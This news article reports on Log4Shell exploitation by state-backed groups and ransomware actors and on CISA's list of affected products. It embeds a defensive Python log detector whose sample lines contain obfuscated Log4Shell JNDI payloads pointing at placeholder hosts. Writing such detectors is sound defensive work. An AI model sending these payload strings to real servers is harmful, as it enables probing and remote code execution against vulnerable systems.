State-sponsored hackers from China, Iran, North Korea and Turkey have started testing, exploiting and using the Log4j bug to deploy malware, including ransomware, according to Microsoft.
As predicted by officials at the US Cybersecurity and Infrastructure Security Agency (CISA), more sophisticated attackers have now started exploiting the so-called Log4Shell bug (CVE-2021-44228), which affects devices and applications running vulnerable versions of the Log4j Java library. It's a potent flaw that allows a remote attacker to take over an affected device.
CISA officials on Tuesday warned that hundreds of millions of enterprise and consumer devices are at risk until the bug is patched.
The bulk of attacks that Microsoft has observed so far have been related to mass scanning by attackers attempting to fingerprint vulnerable systems, as well as scanning by security companies and researchers.
"The vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems," Microsoft said.
Its ease of exploitation and wide distribution in products makes it an attractive target for sophisticated criminal and state-sponsored attackers.
It is this latter group that has now started exploiting the flaw.
"This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor's objectives," Microsoft said.
Microsoft has turned the spotlight on the Iranian hacking group it tracks as Phosphorus, which recently ramped up its use of file-encryption tools to deploy ransomware on targets. The group has acquired and modified the Log4j exploit for use, according to the Microsoft Threat Intelligence Center (MSTIC).
"We assess that Phosphorus has operationalized these modifications," the MSTIC notes.
Hafnium, a Beijing-backed hacking group behind this year's Exchange Server flaws, has also been using Log4Shell to "target virtualization infrastructure to extend their typical targeting."
Microsoft saw the systems used by Hafnium employing a Domain Name System (DNS) service to fingerprint systems.
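As an added illustration of the scanning and DNS-based fingerprinting activity described above (example code written for this article, not Microsoft's or CISA's tooling), the following Python detector collapses the nested-lookup obfuscations commonly seen in probes and flags web-server log lines that still contain a JNDI lookup afterwards. The log lines are constructed samples and the hostnames are placeholders on the reserved .invalid domain.

```python
import re
from urllib.parse import unquote

# Log4j resolves ${...} lookups recursively, so probes often hide the keyword
# inside nested lookups such as ${lower:j} or ${::-j}. Reduce those forms first.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")  # ${x:-value} -> value
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode and collapse nested lookups until the text stops changing."""
    text = unquote(text)
    for _ in range(max_rounds):  # bounded so hostile input cannot loop forever
        reduced = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(), text)
        reduced = DEFAULT_LOOKUP.sub(lambda m: m.group(1), reduced)
        if reduced == text:
            break
        text = reduced
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup once obfuscation is removed."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def find_probes(lines):
    """Return the log lines that carry a Log4Shell-style lookup."""
    return [line for line in lines if is_log4shell_probe(line)]


# Constructed sample access-log lines (plain, URL-encoded, nested-lookup, benign).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Dec/2021:10:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://scanner.example.invalid/a}"',
    '203.0.113.9 - - [13/Dec/2021:10:02:15 +0000] "GET /?x=%24%7Bjndi%3Adns%3A%2F%2F'
    'probe.example.invalid%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '203.0.113.9 - - [13/Dec/2021:10:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${::-n}di:ldap://scanner.example.invalid/b}"',
    '198.51.100.8 - - [13/Dec/2021:10:02:20 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print("PROBE:", hit)
```

A DNS-scheme lookup like the one in the third sample line is how the fingerprinting Microsoft describes shows up: the vulnerable server resolves an attacker-chosen name, so outbound DNS logs are a second place to look.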
The Log4Shell bug was disclosed by the Apache Software Foundation on December 9. CERT New Zealand reported the bug was actively being exploited. Apache released a patch last week. However, vendors including Cisco, IBM, Oracle, VMware and others still need to integrate the patch into their own affected products before customers can deploy them.
MSTIC and the Microsoft 365 Defender team also confirmed that "access brokers" (gangs who sell or rent access to compromised machines) have been using the Log4j flaw to gain a foothold in target networks on both Linux and Windows systems. This sort of access is frequently sold on to ransomware gangs looking for victims; security firm Bitdefender reported that a new ransomware strain called Khonsari is already attempting to exploit the Log4j bug.
CISA yesterday published on GitHub its list of products affected by the Log4Shell flaw, following a similar list published earlier this week by the Netherlands cybersecurity agency (NCSC). CISA lists the vendor, product, versions, vulnerability status, and whether an update is available.
The US list will be a handy tool for organizations as they patch affected devices, in particular for US federal agencies, which CISA, a unit of the Department of Homeland Security, yesterday ordered to test which internal applications and servers are vulnerable to the bug by December 24.
Cisco customers will be busy over the next few weeks as the company rolls out patches. Cisco's list of affected products alone highlights the work ahead for agency teams that must enumerate affected systems before the Christmas break. CISA's list also includes an extensive array of affected VMware virtualization software tools, most of which don't have a patch available yet.
Dozens of Cisco software and network products are affected. Cisco released a patch for Webex Meetings Server yesterday. The Cisco CX Cloud Agent Software also got a patch.
Other affected Cisco products without a patch include Cisco's AMP Virtual Private Cloud Appliance, its Advanced Web Security Reporting Application, Firepower Threat Defense (FTD), and Cisco Identity Services Engine (ISE). Several network infrastructure management and provisioning products are also vulnerable, with patches scheduled for December 21 onwards.